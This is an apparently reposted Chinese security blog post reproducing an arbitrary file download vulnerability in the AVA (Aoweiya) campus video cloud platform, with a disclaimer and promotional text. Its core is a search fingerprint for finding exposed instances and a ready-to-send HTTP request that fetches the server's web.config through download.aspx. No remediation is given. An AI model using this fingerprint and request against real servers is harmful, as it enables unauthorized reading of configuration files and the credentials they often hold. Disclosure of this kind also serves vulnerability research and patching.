【漏洞复现】奥威亚视屏云平台任意文件下载漏洞【附POC】
2023-12-28 10:19:24 Author: 天擎攻防实验室(查看原文) 阅读量:36 收藏

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!

产品简介

    广州市奥威亚电子科技有限公司是一家专注于教育信息化产品研发、生产、销售及服务的高新技术企业。奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI课堂分析、大数据看板等,有效满足各区域个性化、定制化应用需求,促进数字化应用与教育教学的深度融合,助力各区域、学校构建数字化教育新样态。

漏洞简介

   广州市奥威亚电子科技有限公司校园视频应用云平台存在任意文件下载漏洞,攻击者可利用该漏洞下载服务器上任意文件,获取敏感信息。

指纹识别

# app="AVA-教学视频应用云平台"

漏洞验证

poc:

GET /download.aspx?file=/web.config HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: ASP.NET_SessionId=15z0s55cmvsttopkzdyt1ud3Upgrade-Insecure-Requests: 1

发送POC:

批量验证:

漏洞收录

漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞

现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。

回复关键字【POC】获取POC下载链接

点击下方名片进入公众号,欢迎关注!

点个小赞你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MzQyMjA1NA==&mid=2247484309&idx=2&sn=21af55b13238b93b3a87df78ca784b7a&chksm=fd48ec0686e1db0c0cdf68c0db1022d3b0a7aa20eb3bb7ab0dddabe71802da84cc1283e77870&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh